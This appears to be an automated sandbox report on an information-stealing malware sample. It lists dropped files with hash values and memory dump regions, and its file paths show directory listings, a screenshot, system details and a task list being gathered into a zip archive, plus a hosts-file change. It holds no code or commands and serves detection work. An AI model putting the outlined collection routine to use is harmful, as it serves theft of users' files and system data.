C:\Users\Admin\AppData\Local\Temp\_MEI49922\select.pyd
| MD5 | e021cf8d94cc009ff79981f3472765e7 |
| SHA1 | c43d040b0e84668f3ae86acc5bd0df61be2b5374 |
| SHA256 | ab40bf48a6db6a00387aece49a03937197bc66b4450559feec72b6f74fc4d01e |
| SHA512 | c5ca57f8e4c0983d9641412e41d18abd16fe5868d016a5c6e780543860a9d3b37cc29065799951cb13dc49637c45e02efb6b6ffeaf006e78d6ce2134eb902c67 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\libssl-3.dll
| MD5 | 264be59ff04e5dcd1d020f16aab3c8cb |
| SHA1 | 2d7e186c688b34fdb4c85a3fce0beff39b15d50e |
| SHA256 | 358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d |
| SHA512 | 9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\libcrypto-3.dll
| MD5 | 7f1b899d2015164ab951d04ebb91e9ac |
| SHA1 | 1223986c8a1cbb57ef1725175986e15018cc9eab |
| SHA256 | 41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986 |
| SHA512 | ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\blank.aes
| MD5 | a18a2670024e849f0c6219103fb6dd3f |
| SHA1 | a8d9f28c53612a702fee403ddb0608e15c522a82 |
| SHA256 | 65e6583d8708ec9633a53e7aaf93ce91d38ba4296c7b7480f49c237ab50e93e8 |
| SHA512 | 6a1f0f76287c2a275fc10bf97941e03da7908215a408d41e3f680534e8ff5973421f8ce662812eddb19aecf122230f5c83562b7c02897dd009a12da41437d16e |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_moa0a5b4.yuz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Windows\System32\drivers\etc\hosts
| MD5 | f99e42cdd8b2f9f1a3c062fe9cf6e131 |
| SHA1 | e32bdcab8da0e3cdafb6e3876763cee002ab7307 |
| SHA256 | a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0 |
| SHA512 | c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6 |
\??\c:\Users\Admin\AppData\Local\Temp\x5xeol1u\x5xeol1u.cmdline
| MD5 | 5aca8f778004cd7fa853d33dc2295ce2 |
| SHA1 | 0b409dbb92365052cf8143cfa1d8787b80738d1d |
| SHA256 | ff49246896042fa495c1365a12ba0fe7d49d4e969d7bad6e9641f0b401107434 |
| SHA512 | d483801eea5fae838782ceded1f75916a09c360a19fcc8edbd950c7a94851f66c9ea544bbdfaac3c678dea051106955049c5219e7090e6bf0d4fcacdcdd79054 |
\??\c:\Users\Admin\AppData\Local\Temp\x5xeol1u\x5xeol1u.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
\??\c:\Users\Admin\AppData\Local\Temp\x5xeol1u\CSC93BD618D8B734D548C40C38081E279FF.TMP
| MD5 | a6ed6e280395471274138461e3aa9ace |
| SHA1 | e7e52f19db47f5ac819123a68a34a7f5dd9af782 |
| SHA256 | d455c3379af9addaef1edc7fb297bf2f9144aa653de553b2a7e521614f8ecdee |
| SHA512 | 68d3998a55cd2866ebfeb334a4839687934be6c35e06098148a9cccfa64433c0b46515a0c01255f0d710fc3d09caa2b3569253935dfa7a2dadf82a13675ae320 |
C:\Users\Admin\AppData\Local\Temp\RES6A14.tmp
| MD5 | 8a650c6ed51a264fe09b85da8b3ac265 |
| SHA1 | a9e83a49d5cc0c2c0cf52ddcece2c289c5f7bbb7 |
| SHA256 | 1cb5178fd915d9a8a887b3bfed03a27e76ed744823546c803620c86641ac67d3 |
| SHA512 | 04068999550faaf04a7b3e5095e86edf56d086ea94f81f0d9820c0f11869f72568ad373666d5071728c1f92aeab51e588103dbf889cb9a6b4dbcffa07e4a442b |
memory/2124-146-0x0000022375D60000-0x0000022375D68000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\x5xeol1u\x5xeol1u.dll
| MD5 | 8a97c86db275dfee8d1ab5f458efd4f5 |
| SHA1 | 7a6824349ee7c7e63216783d07688ff641cbdcc4 |
| SHA256 | 46831cfd2bcfc2450443a6a39e455bb0ba19259c558398c5490ad7b057023a83 |
| SHA512 | 0a38f3ba09d99ee5a3f4a5271f2f1f9015ccfc3cb69cf62c67535590d9bb7e7a2bc6bb39086ddc766ff3d35cc58f1921018668374a9a5e9c89c233263e28c62b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8a7753640b549244dafbbbc068e9bc5b |
| SHA1 | 973287b37dd2c8ef662db9829ec82205793e8e78 |
| SHA256 | a700ed9ed24158a89ecb35d49e0ea31f83ba123073ed07f35f990242e1a00799 |
| SHA512 | 0fed225e1fb142050cd8db3a1c104d0fa72c74d673bdc3b3e9259526159c24478d255098c7bd798d936077727ea8c46e4456c393beba66b831724945a573e54b |
memory/212-158-0x00007FF9EB5D0000-0x00007FF9EB74E000-memory.dmp
memory/212-160-0x00007FF9FB000000-0x00007FF9FB019000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ \Directories\Desktop.txt
| MD5 | a7a69c07210cd16f58317024cd9522c4 |
| SHA1 | 6759bb504507f003ba4c18a291970e6dce1dd3cb |
| SHA256 | 771a0452f3c08c440a87a46e8325ae3861454d063e71ffb9a07bb65f57e8eb59 |
| SHA512 | 92a4059978eec74dbc398ea5d935af916d546afc5ad6df1881343e4084ccee51433faf8baf7e99c7a00d18313e60241c86de9495a1e44cfd1cb155a10f30278b |
C:\Users\Admin\AppData\Local\Temp\ \Display (1).png
| MD5 | 87393664cdcc018e0651613ac8c2dac9 |
| SHA1 | 099ee6c7a5b65355a1712719e1770fc5ec767d7b |
| SHA256 | ed8f053254f03e1f9d2b262fec9bf36edaab935a179d50f7dec60bede7c6911f |
| SHA512 | 53988b060f96b952352bffe64d517d8d0f82119c7e5593221a697ce31a104e4dbf43f132db6d5ff3a10bf8cd63c2a5dd4797e3f8a6ef2821a7fb01d898b26e25 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Videos.txt
| MD5 | e140e10b2b43ba6f978bee0aa90afaf7 |
| SHA1 | bbbeb7097ffa9c2daa3206b3f212d3614749c620 |
| SHA256 | c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618 |
| SHA512 | df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Pictures.txt
| MD5 | 6530968aa22c3f1719db74236282ddbf |
| SHA1 | f219a9d0756796d20608c84c2b80554bd8cb277e |
| SHA256 | 2b0946a11e59e4a8631463ab21f230f7d417b47cbce6a8dc517645e3efd9fef0 |
| SHA512 | dd02d6228356485ad5df83ad9bcdb0f0fbc0d4b19625c3176ad9391e0820a085dba843c1cfb837107329a741d1c75ebddb216f3669edcc59fc3462818d80adc3 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Music.txt
| MD5 | 1e14f6d525ced3279fe629aed063429a |
| SHA1 | 909892724eb0f7a73db8726546b00b62c519e7fe |
| SHA256 | c6b374392c031875ef56132b8dea8a6e3acc938f7c6a710905ee3b725b6766d3 |
| SHA512 | e79725957ac983bacfc3d8114a1bdf6644e42e142cad0a665860acdb07ab362bfe4c4b4e932cd89b5795fbae9cfa1570a8415c4d748941ea3bb4b051d69ff124 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Downloads.txt
| MD5 | a6c17592ce0f3235e89f42c8faba08d4 |
| SHA1 | 853e0924ae03b7784299103c4db08bba90bb60dd |
| SHA256 | 910ebfbbe2b984777b48a32ffbea473afffd631c7601f6c559dc2d6a6ec7863b |
| SHA512 | 5227131d2ff89d17caa37b5bd027a317e745235788abe3968cdcc0f4dc205e749b6e41e3dfcc10ae2b8db93eb936195baab4f4cbfc145fe0c6c3a2adf8fa1576 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Documents.txt
| MD5 | 3b88658e33c842943000a1c4df1bad1d |
| SHA1 | a3d9fdf3e32a0b82de380ac4cd5e274bdb513975 |
| SHA256 | 5b2127372485940b91f40798df5182c314b20eef9c89d2e7ef19259b690e03e6 |
| SHA512 | faf165d278d60feeccc2ed95677b02d7cda7ee3c7cb1ccb617f8e40ae0c2f1893ad2546325bcf8dd2f671b0dcfaf73954824a9e74027c2823bafc83a79494c7e |
C:\Users\Admin\AppData\Local\Temp\ \System\MAC Addresses.txt
| MD5 | ae3df1602c6b6124ba1ea2dd242d2622 |
| SHA1 | 398a828cae01fa3c9b5fe4ec51c81c903c4e4d1b |
| SHA256 | 6021f29f11eed78a5438edef612743520d7a72b5a16ab9c2094827363fe13f1b |
| SHA512 | d20930c2325b2874885151881d62979632d16154183720d668ec9e300b77e5f9143fe5fb4f6572261f5e522d73e9865de114c9884316a490b56171743b35a4ef |
C:\Users\Admin\AppData\Local\Temp\ \System\System Info.txt
| MD5 | bb78ec3e54916cfad87c8620d4a705e6 |
| SHA1 | 458e08823cd29f68f2d465a6d7eec2879f85d049 |
| SHA256 | fb611673c8c02bf66d323a5c66e76f75df231e01242d8133dbba186b824e2ccc |
| SHA512 | 60455f1fab0c35572d65e8c24533fc2a2ea58395032509d37ce656a96b2ba5f0f8533b517f98262a3eefb1e0aa2d9d1ace1f3c08ab2767f5af6da713587cbe72 |
C:\Users\Admin\AppData\Local\Temp\ \System\Task List.txt
| MD5 | f197ef2507482817c526e67653546f89 |
| SHA1 | 2afaaca068b9152f365d8672ff22d2b71f4334c8 |
| SHA256 | 3891c53f9031420027f37acb2ee3bff63d510fd02f546d4ec30ba79fc8df52a6 |
| SHA512 | e8595d26e7db9f29e72bda1e142efc84fc8a1c51662544f71ecf6dbd41548cdc50ff3384738bc02805d2b3cb649e130f9368df22637c176e04226be0d85f85e2 |
C:\Users\Admin\AppData\Local\Temp\geNAr.zip
| MD5 | 8c97e7ad5a8ef7ac029d7b5a24f93f99 |
| SHA1 | 41b89f6eb37a5e29f79a5544cbc3c84d77f472e8 |
| SHA256 | 9675b4f3b289982dd4545a6dcc8ccc1d87fc187c3afe29846ef0939b22fc5b09 |
| SHA512 | edfa914528209e2ea48dcab91cf45cf0f3082a5b02e689093baa1cb406e742a700c309f5da2bb95878f84f4d8b821a9ebc493b29aeedf05f9d5123bb1c1d55f4 |
memory/212-176-0x00007FFA00170000-0x00007FFA00194000-memory.dmp
memory/212-184-0x00007FF9ECA00000-0x00007FF9ECA33000-memory.dmp
memory/212-189-0x00007FF9EB820000-0x00007FF9EB93C000-memory.dmp
memory/212-186-0x00007FF9EAA10000-0x00007FF9EAF39000-memory.dmp
memory/212-175-0x00007FF9EBCB0000-0x00007FF9EC2A2000-memory.dmp
memory/212-185-0x00007FF9EAF40000-0x00007FF9EB00D000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 235a8eb126d835efb2e253459ab8b089 |
| SHA1 | 293fbf68e6726a5a230c3a42624c01899e35a89f |
| SHA256 | 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686 |
| SHA512 | a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92 |
memory/212-212-0x00007FF9EBCB0000-0x00007FF9EC2A2000-memory.dmp
memory/212-236-0x00007FF9EAF40000-0x00007FF9EB00D000-memory.dmp
memory/212-237-0x00007FF9EAA10000-0x00007FF9EAF39000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI49922\blank.aes
| MD5 | 4ee0a30fb1d788c9434d7610d7c3031c |
| SHA1 | 0bcc1d2897d3d4da3f944fd7150d0110178f29fc |
| SHA256 | 7535b2a2d8d883d4472edaeb3724853396a77243efdc679d81da5d61e87bfaab |
| SHA512 | c836ad8ab66d972b40bf31a4b7d34b62ce48baf0c3f45e6c039363acb44e04a9201fa78c74c0b536f5dad67610b1365291f2c40ef70afa7a76d013c3a4819c0b |
memory/212-235-0x00007FF9ECA00000-0x00007FF9ECA33000-memory.dmp
memory/212-234-0x00007FF9FDA50000-0x00007FF9FDA5D000-memory.dmp
memory/212-233-0x00007FF9FB000000-0x00007FF9FB019000-memory.dmp
memory/212-232-0x00007FF9EB5D0000-0x00007FF9EB74E000-memory.dmp
memory/212-231-0x00007FF9FB020000-0x00007FF9FB043000-memory.dmp
memory/212-230-0x00007FF9FB0D0000-0x00007FF9FB0E9000-memory.dmp
memory/212-229-0x00007FF9FB0F0000-0x00007FF9FB11D000-memory.dmp
memory/212-228-0x00007FFA00EE0000-0x00007FFA00EEF000-memory.dmp
memory/212-227-0x00007FFA00170000-0x00007FFA00194000-memory.dmp
memory/212-226-0x00007FF9EB820000-0x00007FF9EB93C000-memory.dmp
memory/212-225-0x00007FF9FD960000-0x00007FF9FD96D000-memory.dmp
memory/212-224-0x00007FF9FA620000-0x00007FF9FA634000-memory.dmp